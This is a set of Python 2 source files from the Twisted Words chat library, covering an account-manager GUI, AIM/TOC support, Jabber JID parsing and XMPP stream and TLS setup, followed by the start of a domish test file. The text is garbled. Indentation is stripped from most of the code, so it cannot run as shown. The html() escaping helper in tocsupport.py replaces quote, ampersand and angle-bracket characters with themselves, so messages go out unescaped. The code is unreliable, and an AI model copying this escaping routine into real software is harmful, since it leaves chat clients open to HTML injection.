def __init__(self):
self.acctmanager = AccountManager()
self.mainframe = JFrame("Account Manager")
self.chatui = None
self.headers = ["Account Name", "Status", "Autologin", "Gateway"]
self.data = UneditableTableModel([], self.headers)
self.table = JTable(self.data)
self.table.columnSelectionAllowed = 0 #cannot select columns
self.table.selectionMode = ListSelectionModel.SINGLE_SELECTION
self.connectbutton = JButton("Connect", actionPerformed=self.connect)
self.dconnbutton = JButton("Disconnect", actionPerformed=self.disconnect)
self.deletebutton = JButton("Delete", actionPerformed=self.deleteAccount)
self.buildpane()
self.mainframe.pack()
self.mainframe.show()
def buildpane(self):
buttons = JPanel(FlowLayout(), doublebuffered)
buttons.add(self.connectbutton)
buttons.add(self.dconnbutton)
buttons.add(JButton("New", actionPerformed=self.addNewAccount))
buttons.add(self.deletebutton)
buttons.add(JButton("Quit", actionPerformed=self.quit))
mainpane = self.mainframe.getContentPane()
mainpane.layout = BoxLayout(mainpane, BoxLayout.Y_AXIS)
mainpane.add(JScrollPane(self.table))
mainpane.add(buttons)
self.update()
def update(self):
self.data.setDataVector(self.acctmanager.getSnapShot(), self.headers)
if self.acctmanager.isEmpty():
self.deletebutton.setEnabled(0)
self.connectbutton.setEnabled(0)
self.dconnbutton.setEnabled(0)
else:
self.deletebutton.setEnabled(1)
if not 1 in self.acctmanager.getConnectionInfo(): #all disconnected
self.dconnbutton.setEnabled(0)
self.connectbutton.setEnabled(1)
elif not 0 in self.acctmanager.getConnectionInfo(): #all connected
self.dconnbutton.setEnabled(1)
self.connectbutton.setEnabled(0)
else:
self.dconnbutton.setEnabled(1)
self.connectbutton.setEnabled(1)
#callable button actions
def connect(self, ae):
print "Trying to connect"
row = self.table.getSelectedRow()
if row < 0:
print "Trying to connect to an account but no account selected"
else:
acctname = self.data.getValueAt(row, 0)
if not self.chatui:
self.chatui = twisted.words.im.jychat.JyChatUI()
self.acctmanager.connect(acctname, self.chatui)
self.update()
def disconnect(self, ae):
print "Trying to disconnect"
row = self.table.getSelectedRow()
if row < 0:
print "Trying to logoff an account but no account was selected."
else:
acctname = self.data.getValueAt(row, 0)
self.acctmanager.disconnect(acctname)
self.update()
def addNewAccount(self, ae):
print "Starting new account creation"
NewAccountGUI(self).show()
def deleteAccount(self, ae):
print "Deleting account"
row = self.table.getSelectedRow()
if row < 0:
print "Trying to delete an account but no account selected"
else:
acctname = self.data.getValueAt(row, 0)
self.acctmanager.delAccount(acctname)
self.update()
def quit(self, ae):
self.acctmanager.quit()
sys.exit()
if __name__ == "__main__":
n = AccountManagementGUI()
```
#### File: words/im/tocsupport.py
```python
import string, re
from zope.interface import implements
# Twisted Imports
from twisted.words.protocols import toc
from twisted.words.im.locals import ONLINE, OFFLINE, AWAY
from twisted.internet import defer, reactor, protocol
from twisted.internet.defer import succeed
# Sibling Imports
from twisted.words.im import basesupport, interfaces, locals
def dehtml(text):
text=string.replace(text,"<br>","\n")
text=string.replace(text,"<BR>","\n")
text=string.replace(text,"<Br>","\n") # XXX make this a regexp
text=string.replace(text,"<bR>","\n")
text=re.sub('<.*?>','',text)
    text=string.replace(text,'&gt;','>')
    text=string.replace(text,'&lt;','<')
    text=string.replace(text,'&nbsp;',' ')
    text=string.replace(text,'&quot;','"')
    text=string.replace(text,'&amp;','&') # decode &amp; last so other entities are not double-decoded
return text
def html(text):
text=string.replace(text,'"','"')
text=string.replace(text,'&','&')
text=string.replace(text,'<','<')
text=string.replace(text,'>','>')
text=string.replace(text,"\n","<br>")
return '<font color="#000000" back="#ffffff" size=3>%s</font>'%text
class TOCPerson(basesupport.AbstractPerson):
def isOnline(self):
return self.status != OFFLINE
def getStatus(self):
return self.status
def getIdleTime(self):
return str(self.idletime)
def setStatusAndIdle(self, status, idletime):
if self.account.client is None:
raise locals.OfflineError
self.status = status
self.idletime = idletime
self.account.client.chat.getContactsList().setContactStatus(self)
def sendMessage(self, text, meta=None):
if self.account.client is None:
raise locals.OfflineError
if meta:
if meta.get("style", None) == "emote":
text="* "+text+"* "
self.account.client.say(self.name,html(text))
return succeed(text)
class TOCGroup(basesupport.AbstractGroup):
implements(interfaces.IGroup)
def __init__(self, name, tocAccount):
basesupport.AbstractGroup.__init__(self, name, tocAccount)
self.roomID = self.client.roomID[self.name]
def sendGroupMessage(self, text, meta=None):
if self.account.client is None:
raise locals.OfflineError
if meta:
if meta.get("style", None) == "emote":
text="* "+text+"* "
self.account.client.chat_say(self.roomID,html(text))
return succeed(text)
def leave(self):
if self.account.client is None:
raise locals.OfflineError
self.account.client.chat_leave(self.roomID)
class TOCProto(basesupport.AbstractClientMixin, toc.TOCClient):
def __init__(self, account, chatui, logonDeferred):
toc.TOCClient.__init__(self, account.username, account.password)
basesupport.AbstractClientMixin.__init__(self, account, chatui,
logonDeferred)
self.roomID = {}
self.roomIDreverse = {}
def _debug(self, m):
pass #print '<toc debug>', repr(m)
def getGroupConversation(self, name, hide=0):
return self.chat.getGroupConversation(
self.chat.getGroup(name, self), hide)
def addContact(self, name):
self.add_buddy([name])
if not self._buddylist.has_key('TwistedIM'):
self._buddylist['TwistedIM'] = []
if name in self._buddylist['TwistedIM']:
# whoops, don't add again
return
self._buddylist['TwistedIM'].append(name)
self.set_config(self._config_mode, self._buddylist, self._permit, self._deny)
def getPerson(self,name):
return self.chat.getPerson(name, self)
def onLine(self):
self.account._isOnline = 1
#print '$$!&*$&!(@$*& TOC ONLINE *!#@&$(!*%&'
def gotConfig(self, mode, buddylist, permit, deny):
#print 'got toc config', repr(mode), repr(buddylist), repr(permit), repr(deny)
self._config_mode = mode
self._buddylist = buddylist
self._permit = permit
self._deny = deny
if permit:
self._debug('adding permit')
self.add_permit(permit)
if deny:
self._debug('adding deny')
self.add_deny(deny)
clist=[]
for k in buddylist.keys():
self.add_buddy(buddylist[k])
for name in buddylist[k]:
self.getPerson(name).setStatusAndIdle(OFFLINE, '--')
self.signon()
name = None
def tocNICK(self,data):
if not self.name:
print 'Waiting for second NICK', data
self.name=data[0]
self.accountName = '%s (TOC)' % self.name
self.chat.getContactsList()
else:
print 'reregistering...?', data
self.name=data[0]
# self.accountName = "%s (TOC)"%data[0]
if self._logonDeferred is not None:
self._logonDeferred.callback(self)
self._logonDeferred = None
### Error Messages
def hearError(self, code, args):
print '*** TOC ERROR ***', repr(code), repr(args)
def hearWarning(self, newamount, username):
print '*** TOC WARNING ***', repr(newamount), repr(username)
### Buddy Messages
def hearMessage(self,username,message,autoreply):
if autoreply:
message='<AUTO-REPLY>: '+message
self.chat.getConversation(self.getPerson(username)
).showMessage(dehtml(message))
def updateBuddy(self,username,online,evilness,signontime,idletime,userclass,away):
if away:
status=AWAY
elif online:
status=ONLINE
else:
status=OFFLINE
self.getPerson(username).setStatusAndIdle(status, idletime)
### Group Chat
def chatJoined(self, roomid, roomname, users):
self.roomID[roomname]=roomid
self.roomIDreverse[roomid]=roomname
self.getGroupConversation(roomname).setGroupMembers(users)
def chatUpdate(self,roomid,member,inroom):
group=self.roomIDreverse[roomid]
if inroom:
self.getGroupConversation(group).memberJoined(member)
else:
self.getGroupConversation(group).memberLeft(member)
def chatHearMessage(self, roomid, username, message):
if toc.normalize(username) == toc.normalize(self.name):
return # ignore the message
group=self.roomIDreverse[roomid]
self.getGroupConversation(group).showGroupMessage(username, dehtml(message))
def chatHearWhisper(self, roomid, username, message):
print '*** user whispered *** ', roomid, username, message
def chatInvited(self, roomid, roomname, username, message):
print '*** user invited us to chat *** ',roomid, roomname, username, message
def chatLeft(self, roomid):
group=self.roomIDreverse[roomid]
self.getGroupConversation(group,1)
del self.roomID[group]
del self.roomIDreverse[roomid]
def rvousProposal(self,type,cookie,user,vip,port,**kw):
print '*** rendezvous. ***', type, cookie, user, vip, port, kw
def receiveBytes(self, user, file, chunk, sofar, total):
print '*** File transfer! ***', user, file, chunk, sofar, total
def joinGroup(self,name):
self.chat_join(4,toc.normalize(name))
class TOCAccount(basesupport.AbstractAccount):
implements(interfaces.IAccount)
gatewayType = "AIM (TOC)"
_groupFactory = TOCGroup
_personFactory = TOCPerson
def _startLogOn(self, chatui):
logonDeferred = defer.Deferred()
cc = protocol.ClientCreator(reactor, TOCProto, self, chatui,
logonDeferred)
d = cc.connectTCP(self.host, self.port)
d.addErrback(logonDeferred.errback)
return logonDeferred
```
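The `dehtml`/`html` helpers above translate between plain text and the HTML fragments the TOC service exchanges. A minimal round-trip sketch (illustration only; it just assumes the module is importable under its usual path):

```python
# Illustration only: escape outgoing text, then recover it from the wire form.
from twisted.words.im.tocsupport import dehtml, html

wire = html('5 < 7 & "quotes"')   # wraps the text in a <font> tag and escapes &, ", <, >
plain = dehtml(wire)              # strips the tags and decodes the entities again
print plain                       # -> 5 < 7 & "quotes"
```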
#### File: protocols/jabber/jid.py
```python
from twisted.internet import reactor, protocol, defer
from twisted.words.xish import domish, utility
from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep, resourceprep, nameprep
import string
class InvalidFormat(Exception):
pass
def parse(jidstring):
user = None
server = None
resource = None
# Search for delimiters
user_sep = jidstring.find("@")
res_sep = jidstring.find("/")
if user_sep == -1:
if res_sep == -1:
# host
server = jidstring
else:
# host/resource
server = jidstring[0:res_sep]
resource = jidstring[res_sep + 1:] or None
else:
if res_sep == -1:
# user@host
user = jidstring[0:user_sep] or None
server = jidstring[user_sep + 1:]
else:
if user_sep < res_sep:
# user@host/resource
user = jidstring[0:user_sep] or None
server = jidstring[user_sep + 1:user_sep + (res_sep - user_sep)]
resource = jidstring[res_sep + 1:] or None
else:
# server/resource (with an @ in resource)
server = jidstring[0:res_sep]
resource = jidstring[res_sep + 1:] or None
return prep(user, server, resource)
def prep(user, server, resource):
""" Perform stringprep on all JID fragments """
if user:
try:
user = nodeprep.prepare(unicode(user))
except UnicodeError:
raise InvalidFormat, "Invalid character in username"
else:
user = None
if not server:
raise InvalidFormat, "Server address required."
else:
try:
server = nameprep.prepare(unicode(server))
except UnicodeError:
raise InvalidFormat, "Invalid character in hostname"
if resource:
try:
resource = resourceprep.prepare(unicode(resource))
except UnicodeError:
raise InvalidFormat, "Invalid character in resource"
else:
resource = None
return (user, server, resource)
__internJIDs = {}
def internJID(str):
""" Return interned JID.
Assumes C{str} is stringprep'd.
"""
if str in __internJIDs:
return __internJIDs[str]
else:
j = JID(str)
__internJIDs[str] = j
return j
class JID:
""" Represents a stringprep'd Jabber ID.
Note that it is assumed that the attributes C{host}, C{user} and
C{resource}, when set individually, have been properly stringprep'd.
"""
def __init__(self, str = None, tuple = None):
assert (str or tuple)
if str:
user, host, res = parse(str)
else:
user, host, res = prep(*tuple)
self.host = host
self.user = user
self.resource = res
def userhost(self):
if self.user:
return "%s@%s" % (self.user, self.host)
else:
return self.host
def userhostJID(self):
if self.resource:
if "_uhjid" not in self.__dict__:
self._uhjid = internJID(self.userhost())
return self._uhjid
else:
return self
def full(self):
if self.user:
if self.resource:
return "%s@%s/%s" % (self.user, self.host, self.resource)
else:
return "%s@%s" % (self.user, self.host)
else:
if self.resource:
return "%s/%s" % (self.host, self.resource)
else:
return self.host
def __eq__(self, other):
return (self.user == other.user and
self.host == other.host and
self.resource == other.resource)
def __ne__(self, other):
return not (self.user == other.user and
self.host == other.host and
self.resource == other.resource)
```
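A short sketch of how the JID helpers above are typically used (the host and resource values are made up for illustration):

```python
from twisted.words.protocols.jabber.jid import JID, InvalidFormat, internJID

j = JID("user@example.org/Home")              # runs parse() and prep() on the string
print j.user, j.host, j.resource              # -> user example.org Home
print j.userhost(), j.full()                  # -> user@example.org user@example.org/Home

# internJID() caches by string, so equal strings yield the same object.
assert internJID(j.full()) is internJID(j.full())

try:
    JID("/resource-without-a-server")         # missing server part
except InvalidFormat:
    pass
```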
#### File: protocols/jabber/jstrports.py
```python
from twisted.application import strports
def _parseTCPSSL(factory, domain, port):
""" For the moment, parse TCP or SSL connections the same """
return (domain, int(port), factory), {}
def _parseUNIX(factory, address):
return (address, factory), {}
_funcs = { "tcp" : _parseTCPSSL,
"unix" : _parseUNIX,
"ssl" : _parseTCPSSL }
def parse(description, factory):
args, kw = strports._parse(description)
return (args[0].upper(),) + _funcs[args[0]](factory, *args[1:], **kw)
def client(description, factory):
from twisted.application import internet
name, args, kw = parse(description, factory)
return getattr(internet, name + 'Client')(*args, **kw)
```
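For context, the description strings accepted above follow the `strports` convention (`tcp:host:port`, `ssl:host:port`, `unix:path`). A hedged usage sketch, with a stand-in factory and a made-up host:

```python
from twisted.internet.protocol import ClientFactory
from twisted.words.protocols.jabber import jstrports

factory = ClientFactory()   # stand-in; normally an xmlstream.XmlStreamFactory
# Yields a twisted.application.internet.TCPClient service wrapping the factory;
# it starts connecting when the service is started.
service = jstrports.client("tcp:jabber.example.org:5269", factory)
```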
#### File: protocols/jabber/xmlstream.py
```python
from zope.interface import directlyProvides, implements
from twisted.internet import defer
from twisted.internet.error import ConnectionLost
from twisted.python import failure
from twisted.words.protocols.jabber import error, ijabber
from twisted.words.xish import domish, xmlstream
from twisted.words.xish.xmlstream import STREAM_CONNECTED_EVENT
from twisted.words.xish.xmlstream import STREAM_START_EVENT
from twisted.words.xish.xmlstream import STREAM_END_EVENT
from twisted.words.xish.xmlstream import STREAM_ERROR_EVENT
try:
from twisted.internet import ssl
except ImportError:
ssl = None
if ssl and not ssl.supported:
ssl = None
STREAM_AUTHD_EVENT = intern("//event/stream/authd")
INIT_FAILED_EVENT = intern("//event/xmpp/initfailed")
NS_STREAMS = 'http://etherx.jabber.org/streams'
NS_XMPP_TLS = 'urn:ietf:params:xml:ns:xmpp-tls'
Reset = object()
def hashPassword(sid, password):
"""
Create a SHA1-digest string of a session identifier and password.
"""
import sha
return sha.new("%s%s" % (sid, password)).hexdigest()
class Authenticator:
"""
Base class for business logic of initializing an XmlStream
Subclass this object to enable an XmlStream to initialize and authenticate
to different types of stream hosts (such as clients, components, etc.).
Rules:
1. The Authenticator MUST dispatch a L{STREAM_AUTHD_EVENT} when the
stream has been completely initialized.
2. The Authenticator SHOULD reset all state information when
L{associateWithStream} is called.
3. The Authenticator SHOULD override L{streamStarted}, and start
initialization there.
@type xmlstream: L{XmlStream}
@ivar xmlstream: The XmlStream that needs authentication
@note: the term authenticator is historical. Authenticators perform
all steps required to prepare the stream for the exchange
of XML stanzas.
"""
def __init__(self):
self.xmlstream = None
def connectionMade(self):
"""
Called by the XmlStream when the underlying socket connection is
in place.
This allows the Authenticator to send an initial root element, if it's
connecting, or wait for an inbound root from the peer if it's accepting
the connection.
Subclasses can use self.xmlstream.send() to send any initial data to
the peer.
"""
def streamStarted(self):
"""
Called by the XmlStream when the stream has started.
A stream is considered to have started when the root element has been
received and, if applicable, the feature set has been received.
"""
def associateWithStream(self, xmlstream):
"""
Called by the XmlStreamFactory when a connection has been made
to the requested peer, and an XmlStream object has been
instantiated.
The default implementation just saves a handle to the new
XmlStream.
@type xmlstream: L{XmlStream}
@param xmlstream: The XmlStream that will be passing events to this
Authenticator.
"""
self.xmlstream = xmlstream
class ConnectAuthenticator(Authenticator):
"""
Authenticator for initiating entities.
"""
namespace = None
def __init__(self, otherHost):
self.otherHost = otherHost
def connectionMade(self):
self.xmlstream.namespace = self.namespace
self.xmlstream.otherHost = self.otherHost
self.xmlstream.sendHeader()
def initializeStream(self):
"""
Perform stream initialization procedures.
An L{XmlStream} holds a list of initializer objects in its
C{initializers} attribute. This method calls these initializers in
order and dispatches the C{STREAM_AUTHD_EVENT} event when the list has
been successfully processed. Otherwise it dispatches the
C{INIT_FAILED_EVENT} event with the failure.
Initializers may return the special L{Reset} object to halt the
initialization processing. It signals that the current initializer was
successfully processed, but that the XML Stream has been reset. An
example is the TLSInitiatingInitializer.
"""
def remove_first(result):
self.xmlstream.initializers.pop(0)
return result
def do_next(result):
"""
Take the first initializer and process it.
On success, the initializer is removed from the list and
            then the next initializer will be tried.
"""
if result is Reset:
return None
try:
init = self.xmlstream.initializers[0]
except IndexError:
self.xmlstream.dispatch(self.xmlstream, STREAM_AUTHD_EVENT)
return None
else:
d = defer.maybeDeferred(init.initialize)
d.addCallback(remove_first)
d.addCallback(do_next)
return d
d = defer.succeed(None)
d.addCallback(do_next)
d.addErrback(self.xmlstream.dispatch, INIT_FAILED_EVENT)
def streamStarted(self):
self.initializeStream()
class FeatureNotAdvertized(Exception):
"""
Exception indicating a stream feature was not advertized, while required by
the initiating entity.
"""
class BaseFeatureInitiatingInitializer(object):
"""
Base class for initializers with a stream feature.
This assumes the associated XmlStream represents the initiating entity
of the connection.
@cvar feature: tuple of (uri, name) of the stream feature root element.
@type feature: tuple of (L{str}, L{str})
@ivar required: whether the stream feature is required to be advertized
by the receiving entity.
@type required: L{bool}
"""
implements(ijabber.IInitiatingInitializer)
feature = None
required = False
def __init__(self, xs):
self.xmlstream = xs
def initialize(self):
"""
Initiate the initialization.
Checks if the receiving entity advertizes the stream feature. If it
does, the initialization is started. If it is not advertized, and the
C{required} instance variable is L{True}, it raises
L{FeatureNotAdvertized}. Otherwise, the initialization silently
succeeds.
"""
if self.feature in self.xmlstream.features:
return self.start()
elif self.required:
raise FeatureNotAdvertized
else:
return None
def start(self):
"""
Start the actual initialization.
May return a deferred for asynchronous initialization.
"""
class TLSError(Exception):
"""
TLS base exception.
"""
class TLSFailed(TLSError):
"""
Exception indicating failed TLS negotiation
"""
class TLSRequired(TLSError):
"""
Exception indicating required TLS negotiation.
This exception is raised when the receiving entity requires TLS
    negotiation and the initiating entity does not desire to negotiate TLS.
"""
class TLSNotSupported(TLSError):
"""
Exception indicating missing TLS support.
This exception is raised when the initiating entity wants and requires to
negotiate TLS when the OpenSSL library is not available.
"""
class TLSInitiatingInitializer(BaseFeatureInitiatingInitializer):
"""
TLS stream initializer for the initiating entity.
It is strongly required to include this initializer in the list of
initializers for an XMPP stream. By default it will try to negotiate TLS.
An XMPP server may indicate that TLS is required. If TLS is not desired,
set the C{wanted} attribute to False instead of removing it from the list
of initializers, so a proper exception L{TLSRequired} can be raised.
@cvar wanted: indicates if TLS negotiation is wanted.
@type wanted: L{bool}
"""
feature = (NS_XMPP_TLS, 'starttls')
wanted = True
_deferred = None
def onProceed(self, obj):
"""
Proceed with TLS negotiation and reset the XML stream.
"""
self.xmlstream.removeObserver('/failure', self.onFailure)
ctx = ssl.CertificateOptions()
self.xmlstream.transport.startTLS(ctx)
self.xmlstream.reset()
self.xmlstream.sendHeader()
self._deferred.callback(Reset)
def onFailure(self, obj):
self.xmlstream.removeObserver('/proceed', self.onProceed)
self._deferred.errback(TLSFailed())
def start(self):
"""
Start TLS negotiation.
This checks if the receiving entity requires TLS, the SSL library is
available and uses the C{required} and C{wanted} instance variables to
determine what to do in the various different cases.
For example, if the SSL library is not available, and wanted and
required by the user, it raises an exception. However if it is not
required by both parties, initialization silently succeeds, moving
on to the next step.
"""
if self.wanted:
if ssl is None:
if self.required:
return defer.fail(TLSNotSupported())
else:
return defer.succeed(None)
else:
pass
elif self.xmlstream.features[self.feature].required:
return defer.fail(TLSRequired())
else:
return defer.succeed(None)
self._deferred = defer.Deferred()
self.xmlstream.addOnetimeObserver("/proceed", self.onProceed)
self.xmlstream.addOnetimeObserver("/failure", self.onFailure)
self.xmlstream.send(domish.Element((NS_XMPP_TLS, "starttls")))
return self._deferred
class XmlStream(xmlstream.XmlStream):
"""
XMPP XML Stream protocol handler.
@ivar version: XML stream version as a tuple (major, minor). Initially,
this is set to the minimally supported version. Upon
receiving the stream header of the peer, it is set to the
minimum of that value and the version on the received
header.
@type version: (L{int}, L{int})
@ivar namespace: default namespace URI for stream
@type namespace: L{str}
@ivar thisHost: hostname of this entity
@ivar otherHost: hostname of the peer entity
@ivar sid: session identifier
@type sid: L{str}
@ivar initiating: True if this is the initiating stream
@type initiating: L{bool}
@ivar features: map of (uri, name) to stream features element received from
the receiving entity.
@type features: L{dict} of (L{str}, L{str}) to L{domish.Element}.
@ivar prefixes: map of URI to prefixes that are to appear on stream
header.
@type prefixes: L{dict} of L{str} to L{str}
@ivar initializers: list of stream initializer objects
@type initializers: L{list} of objects that provide L{IInitializer}
@ivar authenticator: associated authenticator that uses C{initializers} to
initialize the XML stream.
"""
version = (1, 0)
namespace = 'invalid'
thisHost = None
otherHost = None
sid = None
initiating = True
prefixes = {NS_STREAMS: 'stream'}
_headerSent = False # True if the stream header has been sent
def __init__(self, authenticator):
xmlstream.XmlStream.__init__(self)
self.authenticator = authenticator
self.initializers = []
self.features = {}
# Reset the authenticator
authenticator.associateWithStream(self)
def _callLater(self, *args, **kwargs):
from twisted.internet import reactor
return reactor.callLater(*args, **kwargs)
def reset(self):
"""
Reset XML Stream.
Resets the XML Parser for incoming data. This is to be used after
successfully negotiating a new layer, e.g. TLS and SASL. Note that
registered event observers will continue to be in place.
"""
self._headerSent = False
self._initializeStream()
def onStreamError(self, errelem):
"""
Called when a stream:error element has been received.
Dispatches a L{STREAM_ERROR_EVENT} event with the error element to
allow for cleanup actions and drops the connection.
@param errelem: The received error element.
@type errelem: L{domish.Element}
"""
self.dispatch(failure.Failure(error.exceptionFromStreamError(errelem)),
STREAM_ERROR_EVENT)
self.transport.loseConnection()
def onFeatures(self, features):
"""
Called when a stream:features element has been received.
Stores the received features in the C{features} attribute, checks the
need for initiating TLS and notifies the authenticator of the start of
the stream.
@param features: The received features element.
@type features: L{domish.Element}
"""
self.features = {}
for feature in features.elements():
self.features[(feature.uri, feature.name)] = feature
self.authenticator.streamStarted()
def sendHeader(self):
"""
Send stream header.
"""
rootElem = domish.Element((NS_STREAMS, 'stream'), self.namespace)
if self.initiating and self.otherHost:
rootElem['to'] = self.otherHost
elif not self.initiating:
if self.thisHost:
rootElem['from'] = self.thisHost
if self.sid:
rootElem['id'] = self.sid
if self.version >= (1, 0):
rootElem['version'] = "%d.%d" % (self.version[0], self.version[1])
self.rootElem = rootElem
self.send(rootElem.toXml(prefixes=self.prefixes, closeElement=0))
self._headerSent = True
def sendFooter(self):
"""
Send stream footer.
"""
self.send('</stream:stream>')
def sendStreamError(self, streamError):
"""
Send stream level error.
If we are the receiving entity, and haven't sent the header yet,
        we send one first.
If the given C{failure} is a L{error.StreamError}, it is rendered
to its XML representation, otherwise a generic C{internal-error}
stream error is generated.
After sending the stream error, the stream is closed and the transport
connection dropped.
"""
if not self._headerSent and not self.initiating:
self.sendHeader()
if self._headerSent:
self.send(streamError.getElement())
self.sendFooter()
self.transport.loseConnection()
def send(self, obj):
"""
Send data over the stream.
This overrides L{xmlstream.Xmlstream.send} to use the default namespace
of the stream header when serializing L{domish.IElement}s. It is
assumed that if you pass an object that provides L{domish.IElement},
it represents a direct child of the stream's root element.
"""
if domish.IElement.providedBy(obj):
obj = obj.toXml(prefixes=self.prefixes,
defaultUri=self.namespace,
prefixesInScope=self.prefixes.values())
xmlstream.XmlStream.send(self, obj)
def connectionMade(self):
"""
Called when a connection is made.
Notifies the authenticator when a connection has been made.
"""
xmlstream.XmlStream.connectionMade(self)
self.authenticator.connectionMade()
def onDocumentStart(self, rootelem):
"""
Called when the stream header has been received.
Extracts the header's C{id} and C{version} attributes from the root
element. The C{id} attribute is stored in our C{sid} attribute and the
C{version} attribute is parsed and the minimum of the version we sent
and the parsed C{version} attribute is stored as a tuple (major, minor)
in this class' C{version} attribute. If no C{version} attribute was
present, we assume version 0.0.
If appropriate (we are the initiating stream and the minimum of our and
the other party's version is at least 1.0), a one-time observer is
registered for getting the stream features. The registered function is
C{onFeatures}.
Ultimately, the authenticator's C{streamStarted} method will be called.
@param rootelem: The root element.
@type rootelem: L{domish.Element}
"""
xmlstream.XmlStream.onDocumentStart(self, rootelem)
# Extract stream identifier
if rootelem.hasAttribute("id"):
self.sid = rootelem["id"]
# Extract stream version and take minimum with the version sent
if rootelem.hasAttribute("version"):
version = rootelem["version"].split(".")
try:
version = (int(version[0]), int(version[1]))
            except (IndexError, ValueError):
version = (0, 0)
else:
version = (0, 0)
self.version = min(self.version, version)
# Setup observer for stream errors
self.addOnetimeObserver("/error[@xmlns='%s']" % NS_STREAMS,
self.onStreamError)
# Setup observer for stream features, if applicable
if self.initiating and self.version >= (1, 0):
self.addOnetimeObserver('/features[@xmlns="%s"]' % NS_STREAMS,
self.onFeatures)
else:
self.authenticator.streamStarted()
class XmlStreamFactory(xmlstream.XmlStreamFactory):
def __init__(self, authenticator):
xmlstream.XmlStreamFactory.__init__(self)
self.authenticator = authenticator
def buildProtocol(self, _):
self.resetDelay()
# Create the stream and register all the bootstrap observers
xs = XmlStream(self.authenticator)
xs.factory = self
for event, fn in self.bootstraps: xs.addObserver(event, fn)
return xs
class TimeoutError(Exception):
"""
Exception raised when no IQ response has been received before the
configured timeout.
"""
def upgradeWithIQResponseTracker(xs):
"""
Enhances an XmlStream for iq response tracking.
This makes an L{XmlStream} object provide L{IIQResponseTracker}. When a
response is an error iq stanza, the deferred has its errback invoked with a
failure that holds a L{StanzaException<error.StanzaException>} that is
easier to examine.
"""
def callback(iq):
"""
Handle iq response by firing associated deferred.
"""
if getattr(iq, 'handled', False):
return
try:
d = xs.iqDeferreds[iq["id"]]
except KeyError:
pass
else:
del xs.iqDeferreds[iq["id"]]
iq.handled = True
if iq['type'] == 'error':
d.errback(error.exceptionFromStanza(iq))
else:
d.callback(iq)
def disconnected(_):
"""
Make sure deferreds do not linger on after disconnect.
This errbacks all deferreds of iq's for which no response has been
received with a L{ConnectionLost} failure. Otherwise, the deferreds
will never be fired.
"""
iqDeferreds = xs.iqDeferreds
xs.iqDeferreds = {}
for d in iqDeferreds.itervalues():
d.errback(ConnectionLost())
xs.iqDeferreds = {}
xs.iqDefaultTimeout = getattr(xs, 'iqDefaultTimeout', None)
xs.addObserver(xmlstream.STREAM_END_EVENT, disconnected)
xs.addObserver('/iq[@type="result"]', callback)
xs.addObserver('/iq[@type="error"]', callback)
directlyProvides(xs, ijabber.IIQResponseTracker)
class IQ(domish.Element):
"""
Wrapper for an iq stanza.
Iq stanzas are used for communications with a request-response behaviour.
Each iq request is associated with an XML stream and has its own unique id
to be able to track the response.
@ivar timeout: if set, a timeout period after which the deferred returned
by C{send} will have its errback called with a
L{TimeoutError} failure.
@type timeout: C{float}
"""
timeout = None
def __init__(self, xmlstream, type = "set"):
"""
@type xmlstream: L{xmlstream.XmlStream}
@param xmlstream: XmlStream to use for transmission of this IQ
@type type: L{str}
@param type: IQ type identifier ('get' or 'set')
"""
domish.Element.__init__(self, (None, "iq"))
self.addUniqueId()
self["type"] = type
self._xmlstream = xmlstream
def send(self, to=None):
"""
Send out this iq.
Returns a deferred that is fired when an iq response with the same id
is received. Result responses will be passed to the deferred callback.
Error responses will be transformed into a
L{StanzaError<error.StanzaError>} and result in the errback of the
deferred being invoked.
@rtype: L{defer.Deferred}
"""
if to is not None:
self["to"] = to
if not ijabber.IIQResponseTracker.providedBy(self._xmlstream):
upgradeWithIQResponseTracker(self._xmlstream)
d = defer.Deferred()
self._xmlstream.iqDeferreds[self['id']] = d
timeout = self.timeout or self._xmlstream.iqDefaultTimeout
if timeout is not None:
def onTimeout():
del self._xmlstream.iqDeferreds[self['id']]
d.errback(TimeoutError("IQ timed out"))
call = self._xmlstream._callLater(timeout, onTimeout)
def cancelTimeout(result):
if call.active():
call.cancel()
return result
d.addBoth(cancelTimeout)
self._xmlstream.send(self)
return d
```
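A rough sketch of driving the `IQ` wrapper above once a stream is up; `xs` and the payload namespace are assumptions for illustration, not part of the module:

```python
# `xs` is assumed to be a connected, authenticated XmlStream instance.
NS_VERSION = 'jabber:iq:version'      # example payload namespace

iq = IQ(xs, "get")                    # constructor adds a unique id and the type attribute
iq.addElement((NS_VERSION, "query"))
d = iq.send(to="example.org")         # upgrades xs with the IQ response tracker on first use

def gotResult(response):
    print "result:", response.toXml()

def gotError(failure):
    print "failed:", failure.getErrorMessage()

d.addCallbacks(gotResult, gotError)
```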
#### File: words/test/test_domish.py
```python
from twisted.trial import unittest
from twisted.words.xish import domish
class DomishTestCase(unittest.TestCase):
def testEscaping(self):
s = "&<>'\""
        self.assertEquals(domish.escapeToXml(s), "&amp;&lt;&gt;'\"")
        self.assertEquals(domish.escapeToXml(s, 1), "&amp;&lt;&gt;&apos;&quot;")
def testNamespaceObject(self):
ns = domish.Namespace("testns")
self.assertEquals(ns.foo, ("testns", "foo"))
def testElementInit(self):
e = domish.Element((None, "foo"))
self.assertEquals(e.name, "foo")
self.assertEquals(e.uri, None)
self.assertEquals(e.defaultUri, None)
self.assertEquals(e.parent, None)
e = domish.Element(("", "foo"))
self.assertEquals(e.name, "foo")
self.assertEquals(e.uri, "")
self.assertEquals(e.defaultUri, "")
self.assertEquals(e.parent, None)
e = domish.Element(("testns", "foo"))
self.assertEquals(e.name, "foo")
self.assertEquals(e.uri, "testns")
self.assertEquals(e.defaultUri, "testns")
self.assertEquals(e.parent, None)
e = domish.Element(("testns", "foo"), "test2ns")
self.assertEquals(e.name, "foo")
self.assertEquals(e.uri, "testns")
self.assertEquals(e.defaultUri, "test2ns")
def testChildOps(self):
e = domish.Element(("testns", "foo"))
e.addContent("somecontent")
b2 = e.addElement(("testns2", "bar2"))
e["attrib1"] = "value1"
e[("testns2", "attrib2")] = "value2"
e.addElement("bar")
e.addElement("bar")
e.addContent("abc")
e.addContent("123")
# Check content merging
self.assertEquals(e.children[-1], "abc123")
# Check str()/content extraction
self.assertEquals(str(e), "somecontent")
# Check direct child accessor
self.assertEquals(e.bar2, b2)
e.bar2.addContent("subcontent")
e.bar2["bar2value"] = "somevalue"
# Check child ops
self.assertEquals(e.children[1], e.bar2)
self.assertEquals(e.children[2], e.bar)
# Check attribute ops
self.assertEquals(e["attrib1"], "value1")
del e["attrib1"]
self.assertEquals(e.hasAttribute("attrib1"), 0)
self.assertEquals(e.hasAttribute("attrib2"), 0)
self.assertEquals(e[("testns2", "attrib2")], "value2")
class DomishStreamTests:
